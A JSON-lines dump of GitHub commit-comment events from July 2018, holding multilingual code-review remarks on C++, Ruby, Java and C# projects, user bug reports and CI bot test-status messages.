{"id":"7941490725","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650965,"position":24,"line":119,"path":"Source/Foundation/bsfEngine/BsApplication.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T05:02:11Z","updated_at":"2018-07-10T05:02:11Z","author_association":"CONTRIBUTOR","body":"Do you have a preference on whether to use trinary conditionals?\r\n\r\n```\r\nSPtr<Camera> overlayCamera =     camera\r\n                                                      ?  camera\r\n                                                      : gSceneManager().getMainCamera();\r\n```"}},"created_at":"2018-07-10T05:02:11Z"}
{"id":"7941491742","type":"CommitCommentEvent","actor":{"login":"54sherlock"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29650968,"position":2,"line":2,"path":"respo/config-client-dev.properties","commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-10T05:02:37Z","updated_at":"2018-07-10T05:02:37Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-10T05:02:37Z"}
{"id":"7941492191","type":"CommitCommentEvent","actor":{"login":"tichbk06"},"repo":{"name":"nukeviet/module-shops"},"payload":{"comment":{"id":29650969,"position":null,"line":null,"path":null,"commit_id":"b83afe2c701ec4feb1367860b5f04b8236cb007b","created_at":"2018-07-10T05:02:48Z","updated_at":"2018-07-10T05:02:48Z","author_association":"NONE","body":"Mình copy 2 file này ghi đè file cũ nhưng khi chọn Paypal check out thì hiển thị thông báo \"trang này không hoạt động\""}},"created_at":"2018-07-10T05:02:48Z"}
{"id":"7941493389","type":"CommitCommentEvent","actor":{"login":"sshine"},"repo":{"name":"Athas/EggsML"},"payload":{"comment":{"id":29650972,"position":null,"line":null,"path":null,"commit_id":"9e83e419a598aa2a39fbc02028313732bff66414","created_at":"2018-07-10T05:03:17Z","updated_at":"2018-07-10T05:03:17Z","author_association":"COLLABORATOR","body":"#133 "}},"created_at":"2018-07-10T05:03:17Z"}
{"id":"7941495131","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650974,"position":21,"line":61,"path":"Source/Foundation/bsfEngine/Renderer/BsRendererMaterialManager.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T05:04:02Z","updated_at":"2018-07-10T05:04:02Z","author_association":"CONTRIBUTOR","body":"const String & filename = ..."}},"created_at":"2018-07-10T05:04:02Z"}
{"id":"7941496002","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi3"},"payload":{"comment":{"id":29650975,"position":null,"line":null,"path":null,"commit_id":"f260640482f13476755c9265a8afd1ff8cadcab6","created_at":"2018-07-10T05:04:24Z","updated_at":"2018-07-10T05:04:24Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi3/e943826d-1afe-41a6-b7ce-68a583d5d49f\n"}},"created_at":"2018-07-10T05:04:24Z"}
{"id":"7941497319","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650977,"position":30,"line":375,"path":"Source/Foundation/bsfEngine/Renderer/BsRendererUtility.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T05:04:56Z","updated_at":"2018-07-10T05:04:56Z","author_association":"CONTRIBUTOR","body":"std::move feasible?"}},"created_at":"2018-07-10T05:04:56Z"}
{"id":"7941499613","type":"CommitCommentEvent","actor":{"login":"bluedaniellotus103"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29650980,"position":null,"line":null,"path":null,"commit_id":"b4e6fe50998cd9d5e183175ac9d1cc904de5c040","created_at":"2018-07-10T05:05:51Z","updated_at":"2018-07-10T05:05:51Z","author_association":"NONE","body":"Hi Mosh, \r\nI have followed the step you showed in the video, but the output page does not similar to yours. May I know why please?\r\n![mvc theme](https://user-images.githubusercontent.com/39514564/42490251-b20c15ca-8452-11e8-96af-c47320e5c333.jpg)\r\n"}},"created_at":"2018-07-10T05:05:51Z"}
{"id":"7941499827","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650981,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T05:05:57Z","updated_at":"2018-07-10T05:05:57Z","author_association":"CONTRIBUTOR","body":"you did cstr() instead of c_str() to avoid compatibility with String::c_str()? Or some other reason?"}},"created_at":"2018-07-10T05:05:57Z"}
{"id":"7941503793","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"art102/black_jack"},"payload":{"comment":{"id":29650987,"position":null,"line":null,"path":null,"commit_id":"35e95248d83ceddc74c54ec35dad558f6481473f","created_at":"2018-07-10T05:07:41Z","updated_at":"2018-07-10T05:07:41Z","author_association":"NONE","body":"вот смотри:\r\n```\r\nPlayer: Mu\r\nCount: 24\r\nMoney: 90\r\nCards:  K♣ A♥ 3♠\r\n____________________\r\nPlayer: Дилер\r\nCount: 18\r\nMoney: 110\r\nCards:  8♠ 10♥\r\n____________________\r\n\r\nВы проиграли\r\nХотите сыграть еще раз? (1 - да, 0 - нет)\r\n```\r\nу меня на самом деле 14 очков, а показывает 24 - это ошибка"}},"created_at":"2018-07-10T05:07:41Z"}
{"id":"7941506759","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"art102/black_jack"},"payload":{"comment":{"id":29650991,"position":null,"line":null,"path":null,"commit_id":"35e95248d83ceddc74c54ec35dad558f6481473f","created_at":"2018-07-10T05:08:58Z","updated_at":"2018-07-10T05:08:58Z","author_association":"NONE","body":"здесь вместо 12 насчитал 22:\r\n```\r\nPlayer: Mu\r\nCount: 22\r\nMoney: 100\r\nCards:  K♦ A♥ A♦\r\n____________________\r\nPlayer: Дилер\r\nCount: 20\r\nMoney: 100\r\nCards:  Q♠ Q♣\r\n____________________\r\n\r\nВы проиграли\r\nХотите сыграть еще раз? (1 - да, 0 - нет)\r\n```"}},"created_at":"2018-07-10T05:08:58Z"}
{"id":"7941508368","type":"CommitCommentEvent","actor":{"login":"private95"},"repo":{"name":"private95/financial"},"payload":{"comment":{"id":29650996,"position":22,"line":22,"path":"src/main/java/com/iparhan/financial/until/MD5Utils.java","commit_id":"f2878239187e88861dea6cebe00a9ef2a4db92b1","created_at":"2018-07-10T05:09:38Z","updated_at":"2018-07-10T05:09:38Z","author_association":"OWNER","body":"000"}},"created_at":"2018-07-10T05:09:38Z"}
{"id":"7941508908","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650997,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-10T05:09:52Z","updated_at":"2018-07-10T05:09:52Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2972 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T05:09:52Z"}
{"id":"7941511336","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29650998,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T05:10:48Z","updated_at":"2018-07-10T05:10:48Z","author_association":"CONTRIBUTOR","body":"This whole class is very similar to something the codebase as my work does.\r\n\r\nWe have a reference counted, read-only, string object and then provide a program-wide facility for getting a handle to a specific unique string. Since the string data is read only, and reference counted, the program wide registery only has to hold onto a pointer to the unique string, lookups done by hash-map I think.\r\n\r\n"}},"created_at":"2018-07-10T05:10:48Z"}
{"id":"7941513744","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"art102/black_jack"},"payload":{"comment":{"id":29651001,"position":null,"line":null,"path":null,"commit_id":"35e95248d83ceddc74c54ec35dad558f6481473f","created_at":"2018-07-10T05:11:44Z","updated_at":"2018-07-10T05:11:44Z","author_association":"NONE","body":"предыдущие случаи я все равно проигрывал... но вот здесь то я выиграл на самом деле )))\r\n14 против 7 (дилер правда взял бы еще карту, если бы не подумал, что я уже проиграл)\r\n```\r\nPlayer: Mu\r\nCount: 24\r\nMoney: 80\r\nCards:  Q♦ A♥ 3♦\r\n____________________\r\nPlayer: Дилер\r\nCount: 7\r\nMoney: 120\r\nCards:  2♦ 5♦\r\n____________________\r\n\r\nВы проиграли\r\nХотите сыграть еще раз? (1 - да, 0 - нет)\r\n```"}},"created_at":"2018-07-10T05:11:44Z"}
{"id":"7941514112","type":"CommitCommentEvent","actor":{"login":"benel"},"repo":{"name":"Hypertopic/Cassandre"},"payload":{"comment":{"id":29651002,"position":7,"line":7,"path":"templates/activity.html","commit_id":"25c99b26fc5be065d63e2c1818f8686229f58442","created_at":"2018-07-10T05:11:53Z","updated_at":"2018-07-10T05:11:53Z","author_association":"MEMBER","body":"-400 loc! Well done, Christophe 🎉🤓"}},"created_at":"2018-07-10T05:11:53Z"}
{"id":"7941520375","type":"CommitCommentEvent","actor":{"login":"agriggio"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29651009,"position":null,"line":null,"path":null,"commit_id":"eeebe587ba4a899a10972c23a8e630ffa012e5d7","created_at":"2018-07-10T05:14:24Z","updated_at":"2018-07-10T05:14:24Z","author_association":"COLLABORATOR","body":"@heckflosse definitely a bug, thanks for spotting!"}},"created_at":"2018-07-10T05:14:24Z"}
{"id":"7941520505","type":"CommitCommentEvent","actor":{"login":"curtaion"},"repo":{"name":"curtaion/depping.muisc"},"payload":{"comment":{"id":29651010,"position":null,"line":null,"path":null,"commit_id":"3970963592dfa335933c6f652c5bb458f07cfefa","created_at":"2018-07-10T05:14:28Z","updated_at":"2018-07-10T05:14:28Z","author_association":"OWNER","body":"asa"}},"created_at":"2018-07-10T05:14:28Z"}
{"id":"7941521776","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29651011,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-10T05:14:58Z","updated_at":"2018-07-10T05:14:58Z","author_association":"NONE","body":"刚才尝试了CET转账，转账成功"}},"created_at":"2018-07-10T05:14:58Z"}
{"id":"7941521863","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29651012,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-10T05:15:00Z","updated_at":"2018-07-10T05:15:00Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T05:15:00Z"}
{"id":"7941523290","type":"CommitCommentEvent","actor":{"login":"alexeynechaev"},"repo":{"name":"sol1n/bbcg"},"payload":{"comment":{"id":29651017,"position":null,"line":null,"path":null,"commit_id":"c7b43c17fc2bbdf8ab6593462e6450dee229f0d2","created_at":"2018-07-10T05:15:31Z","updated_at":"2018-07-10T05:15:31Z","author_association":"COLLABORATOR","body":"</div> не лишний, он в <?=$arResult['~DETAIL_TEXT']?> открывается "}},"created_at":"2018-07-10T05:15:31Z"}
{"id":"7941523827","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651019,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T05:15:43Z","updated_at":"2018-07-10T05:15:43Z","author_association":"CONTRIBUTOR","body":"Btw, looking at my local copy of StringID.cpp, you're explicitly instantiating class StringID::StringIDUtil <String> and class StringID::StringIDUtil <const char *> in the cpp file, but not telling other translation units that you've done so.\r\n\r\nIf you declare those two specializations as \"extern\" templates in the cpp file, any other translation units that need that object to exist and doesn't intend to inline the function, will skip code generation (which would have resulted in a weak symbol that the linker would have thrown away. but it's still doing all the same compilation work as normal, just thrown away after)."}},"created_at":"2018-07-10T05:15:43Z"}
{"id":"7941527678","type":"CommitCommentEvent","actor":{"login":"kpeca"},"repo":{"name":"kpeca/iteh"},"payload":{"comment":{"id":29651029,"position":null,"line":null,"path":null,"commit_id":"abaa6884022778aec68cf7e7acf69ef77687e9df","created_at":"2018-07-10T05:17:20Z","updated_at":"2018-07-10T05:17:20Z","author_association":"OWNER","body":"video za pocetnu stranicu"}},"created_at":"2018-07-10T05:17:20Z"}
{"id":"7941536483","type":"CommitCommentEvent","actor":{"login":"micosara"},"repo":{"name":"micosara/git_testt"},"payload":{"comment":{"id":29651038,"position":null,"line":null,"path":null,"commit_id":"0fa5c11e9d9fe59a61200e85233101fc4c4fe34c","created_at":"2018-07-10T05:20:31Z","updated_at":"2018-07-10T05:20:31Z","author_association":"OWNER","body":"rweeserfse"}},"created_at":"2018-07-10T05:20:31Z"}
{"id":"7941536927","type":"CommitCommentEvent","actor":{"login":"alice930608"},"repo":{"name":"alice930608/git_test"},"payload":{"comment":{"id":29651039,"position":null,"line":null,"path":null,"commit_id":"2b3f67087d5e5bbe551cf3f7bc2fea127f91be13","created_at":"2018-07-10T05:20:42Z","updated_at":"2018-07-10T05:20:42Z","author_association":"OWNER","body":"구리구리구리"}},"created_at":"2018-07-10T05:20:42Z"}
{"id":"7941559108","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651072,"position":4,"line":3,"path":"Lesson 3/Station.rb","commit_id":"a615be3e558022e83d9a318d0184c114a2e1849f","created_at":"2018-07-10T05:28:30Z","updated_at":"2018-07-10T05:28:30Z","author_association":"NONE","body":"если у тебя есть ридер `trains`, то зачем тебе еще метод `train_list` - они делают одно и то же - возвращают значение переменной `@trains`"}},"created_at":"2018-07-10T05:28:30Z"}
{"id":"7941560129","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651074,"position":1,"line":93,"path":"Source/Foundation/bsfUtility/String/BsStringID.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T05:28:50Z","updated_at":"2018-07-10T05:28:50Z","author_association":"CONTRIBUTOR","body":"One last thought about the StringIdUtil class.\r\n\r\nSince my day job has so many different kinds of strings (char *, char[], string_literal (custom type), string_view, StringId (our version of what you have here, like i described in the first comment in this change), and our ref-counted read only string, plus, of course, std::string), we have a handful of template functions\r\n\r\nstring_size(), string_data(), string_concat(), string_append(), string_trim(), c_str(), and other similar operations, which are all as generic as you can hope for.\r\n\r\nThis allows for us to generically pass any kind of string we want to any function (when properly templated, of course). and still generically work with the underlying data and size information.\r\n\r\nWould you be interested in something like that? It'd allow you to replace the StringIdUtils class with the generic functions I'm talking about, and if you adopt them elsewhere in the codebase, it helps future proof against changing the string types in the future when std::string_view becomes available."}},"created_at":"2018-07-10T05:28:50Z"}
{"id":"7941560552","type":"CommitCommentEvent","actor":{"login":"inspiration33"},"repo":{"name":"DigitalGoldExchange/dev_utest"},"payload":{"comment":{"id":29651077,"position":null,"line":null,"path":null,"commit_id":"6d91cd84c93be65ee58806d419311f485c2ec39a","created_at":"2018-07-10T05:29:00Z","updated_at":"2018-07-10T05:29:00Z","author_association":"MEMBER","body":"superOwner\r\nOwner\r\nlocker\r\nburner\r\nBlocker\r\nownerOrSuperowner\r\nownerOrLocker\r\nownerOrBurner\r\nownerOrBlocker"}},"created_at":"2018-07-10T05:29:00Z"}
{"id":"7941562425","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651082,"position":4,"line":3,"path":"Lesson 3/Station.rb","commit_id":"a615be3e558022e83d9a318d0184c114a2e1849f","created_at":"2018-07-10T05:29:42Z","updated_at":"2018-07-10T05:29:42Z","author_association":"NONE","body":"в методе `train_list_by_type(value)` лучше аргумент назвать `type` - понятней"}},"created_at":"2018-07-10T05:29:42Z"}
{"id":"7941565179","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651091,"position":24,"line":26,"path":"Source/Foundation/bsfCore/Particles/BsParticleModule.h","commit_id":"d1cc9123798ea88413c5525d3bfddc711585c579","created_at":"2018-07-10T05:30:43Z","updated_at":"2018-07-10T05:30:43Z","author_association":"CONTRIBUTOR","body":"Union of one type? Planning ahead for something?"}},"created_at":"2018-07-10T05:30:43Z"}
{"id":"7941566217","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651092,"position":13,"line":13,"path":"Lesson 3/Station.rb","commit_id":"58a682999ff73f8ebd4cd51b4559e6725ddaa4f7","created_at":"2018-07-10T05:31:06Z","updated_at":"2018-07-10T05:31:06Z","author_association":"NONE","body":"что это за метод?\r\nк какому пункту ТЗ он относится?"}},"created_at":"2018-07-10T05:31:06Z"}
{"id":"7941567915","type":"CommitCommentEvent","actor":{"login":"snnugiser"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29651096,"position":1,"line":1,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-10T05:31:43Z","updated_at":"2018-07-10T05:31:43Z","author_association":"OWNER","body":"函数名 XYZ2BLH更直观"}},"created_at":"2018-07-10T05:31:43Z"}
{"id":"7941568760","type":"CommitCommentEvent","actor":{"login":"ebbnormal"},"repo":{"name":"pablomurasaki/song-a-day-for-a-month"},"payload":{"comment":{"id":29651097,"position":null,"line":null,"path":null,"commit_id":"43ee3c4bd17941416c6bb711ae31f9e5bb2645b1","created_at":"2018-07-10T05:32:02Z","updated_at":"2018-07-10T05:32:02Z","author_association":"CONTRIBUTOR","body":"nice! was that the only thing wrong @pablomurasaki ?"}},"created_at":"2018-07-10T05:32:02Z"}
{"id":"7941569350","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651098,"position":20,"line":20,"path":"Lesson 3/Station.rb","commit_id":"58a682999ff73f8ebd4cd51b4559e6725ddaa4f7","created_at":"2018-07-10T05:32:14Z","updated_at":"2018-07-10T05:32:14Z","author_association":"NONE","body":"не надо смешивать логику и аутпут\r\nочень неверная практика\r\nесли очень хочется сделать аутпут - сделай, но логику пропиши отдельно"}},"created_at":"2018-07-10T05:32:14Z"}
{"id":"7941569665","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651099,"position":5,"line":6,"path":"src/index.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:32:22Z","updated_at":"2018-07-10T05:32:22Z","author_association":"NONE","body":"Left over. Fixed."}},"created_at":"2018-07-10T05:32:22Z"}
{"id":"7941569831","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29651100,"position":5,"line":5,"path":"src/Tests.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T05:32:25Z","updated_at":"2018-07-10T05:32:25Z","author_association":"NONE","body":"Terrible name for test. For any test. Cannot understand what is tested there.\r\nIf it is a test for a single class name it like ClassNameTest"}},"created_at":"2018-07-10T05:32:25Z"}
{"id":"7941570085","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651101,"position":19,"line":23,"path":"src/index.ts","commit_id":"0b32751cd300355c5d15b26cd512c6c5b8d2f53e","created_at":"2018-07-10T05:32:31Z","updated_at":"2018-07-10T05:32:31Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:32:31Z"}
{"id":"7941570209","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29651103,"position":null,"line":null,"path":null,"commit_id":"12e768ed5d8e46f0c97ace1485f7453a18af363a","created_at":"2018-07-10T05:32:34Z","updated_at":"2018-07-10T05:32:34Z","author_association":"CONTRIBUTOR","body":"Actually we shouldn't modify the django-wiki settings.py if we can avoid it. Instead, `WIKI_REVISIONS_PER_MINUTES = 10` can be set at the bottom of https://github.com/nert-gu/Xposition/blob/master/testproject/testproject/settings/base.py, and this settings.py will load that."}},"created_at":"2018-07-10T05:32:34Z"}
{"id":"7941571748","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29651105,"position":12,"line":12,"path":"src/Tests.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T05:33:08Z","updated_at":"2018-07-10T05:33:08Z","author_association":"NONE","body":"System.out.println doesn't a test\r\nuse JUnit asserts."}},"created_at":"2018-07-10T05:33:08Z"}
{"id":"7941573768","type":"CommitCommentEvent","actor":{"login":"allen266"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29651108,"position":1,"line":1,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-10T05:33:53Z","updated_at":"2018-07-10T05:33:53Z","author_association":"NONE","body":"变量申明格式整齐规范，最好和赋值分开"}},"created_at":"2018-07-10T05:33:53Z"}
{"id":"7941574635","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651110,"position":50,"line":127,"path":"src/ThundraWrapper.ts","commit_id":"c3e674a48e4ca224c0df8b8927bb74f4b7b7f42d","created_at":"2018-07-10T05:34:12Z","updated_at":"2018-07-10T05:34:12Z","author_association":"NONE","body":"Fixed."}},"created_at":"2018-07-10T05:34:12Z"}
{"id":"7941574848","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29651111,"position":75,"line":75,"path":"src/Tests.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T05:34:16Z","updated_at":"2018-07-10T05:34:16Z","author_association":"NONE","body":"this is too much elements for this test. 2 is enough"}},"created_at":"2018-07-10T05:34:16Z"}
{"id":"7941574862","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651112,"position":17,"line":17,"path":"Lesson 3/Station.rb","commit_id":"58a682999ff73f8ebd4cd51b4559e6725ddaa4f7","created_at":"2018-07-10T05:34:16Z","updated_at":"2018-07-10T05:34:16Z","author_association":"NONE","body":"`arrival` - это \"прибытие\", т.е. существительное... здесь лучше использовать глагол какой-то\r\nчтобы при использовании метода получилось типа `station.accept(train)` - можно читать как текст и все понятно"}},"created_at":"2018-07-10T05:34:16Z"}
{"id":"7941576273","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29651113,"position":17,"line":17,"path":"Lesson 3/Station.rb","commit_id":"58a682999ff73f8ebd4cd51b4559e6725ddaa4f7","created_at":"2018-07-10T05:34:47Z","updated_at":"2018-07-10T05:34:47Z","author_association":"NONE","body":"аналогичная рекоменадция по `departure`"}},"created_at":"2018-07-10T05:34:47Z"}
{"id":"7941577066","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29651114,"position":15,"line":15,"path":"Solutions3/Task1/Car.cs","commit_id":"4f3fcfe1dc2bda120a928ef10ca43dbcba33b182","created_at":"2018-07-10T05:35:05Z","updated_at":"2018-07-10T05:35:05Z","author_association":"NONE","body":"Пустой конструктор даст возможность создать вагон без мест, лучше если он будет приватным\r\n"}},"created_at":"2018-07-10T05:35:05Z"}
{"id":"7941577356","type":"CommitCommentEvent","actor":{"login":"kobalski"},"repo":{"name":"thundra-io/thundra-lambda-agent-nodejs"},"payload":{"comment":{"id":29651115,"position":56,"line":133,"path":"src/ThundraWrapper.ts","commit_id":"c3e674a48e4ca224c0df8b8927bb74f4b7b7f42d","created_at":"2018-07-10T05:35:11Z","updated_at":"2018-07-10T05:35:11Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-10T05:35:11Z"}
{"id":"7941578442","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29651117,"position":109,"line":109,"path":"src/Tests.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T05:35:28Z","updated_at":"2018-07-10T05:35:28Z","author_association":"NONE","body":"There is annotation @Ignore.\r\nAnd I suppose it fails. Fix it."}},"created_at":"2018-07-10T05:35:28Z"}
{"id":"7941580561","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29651118,"position":6,"line":6,"path":"src/Tests.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T05:36:13Z","updated_at":"2018-07-10T05:36:13Z","author_association":"NONE","body":"Use local lists in test methods"}},"created_at":"2018-07-10T05:36:13Z"}
{"id":"7941581626","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651120,"position":268,"line":533,"path":"Source/Foundation/bsfCore/Particles/BsParticleEmitter.h","commit_id":"ab30383f3b2047411ca01338000a104dfac710b7","created_at":"2018-07-10T05:36:36Z","updated_at":"2018-07-10T05:36:36Z","author_association":"CONTRIBUTOR","body":"You've repeated this same pattern alot here.\r\n\r\nWould a macro that stamps this all out with some string token concatenation make sense?"}},"created_at":"2018-07-10T05:36:36Z"}
{"id":"7941581899","type":"CommitCommentEvent","actor":{"login":"OfflineBrain"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29651121,"position":39,"line":39,"path":"src/Tests.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T05:36:42Z","updated_at":"2018-07-10T05:36:42Z","author_association":"NONE","body":"Doesn't test anything "}},"created_at":"2018-07-10T05:36:42Z"}
{"id":"7941583095","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":29651124,"position":null,"line":null,"path":null,"commit_id":"5c061fce648568de9aab0701fa5dd5ab15a47d6e","created_at":"2018-07-10T05:37:08Z","updated_at":"2018-07-10T05:37:08Z","author_association":"MEMBER","body":"There is more within this commit than described... I think this should be splitted"}},"created_at":"2018-07-10T05:37:08Z"}
{"id":"7941583548","type":"CommitCommentEvent","actor":{"login":"snnugiser"},"repo":{"name":"snnugiser/CodeReview"},"payload":{"comment":{"id":29651125,"position":1,"line":1,"path":"XYZ2BLH.cs","commit_id":"35c7c454be48c8d74aa66e58ba96577e6fc226a8","created_at":"2018-07-10T05:37:18Z","updated_at":"2018-07-10T05:37:18Z","author_association":"OWNER","body":"@allen266  哪一行？ 可以在那一行下面评论"}},"created_at":"2018-07-10T05:37:18Z"}
{"id":"7941584362","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29651128,"position":15,"line":20,"path":"Source/Foundation/bsfCore/Private/RTTI/BsParticleSystemRTTI.h","commit_id":"ab30383f3b2047411ca01338000a104dfac710b7","created_at":"2018-07-10T05:37:35Z","updated_at":"2018-07-10T05:37:35Z","author_association":"CONTRIBUTOR","body":"Curiously recurring template pattern. Nice!"}},"created_at":"2018-07-10T05:37:35Z"}
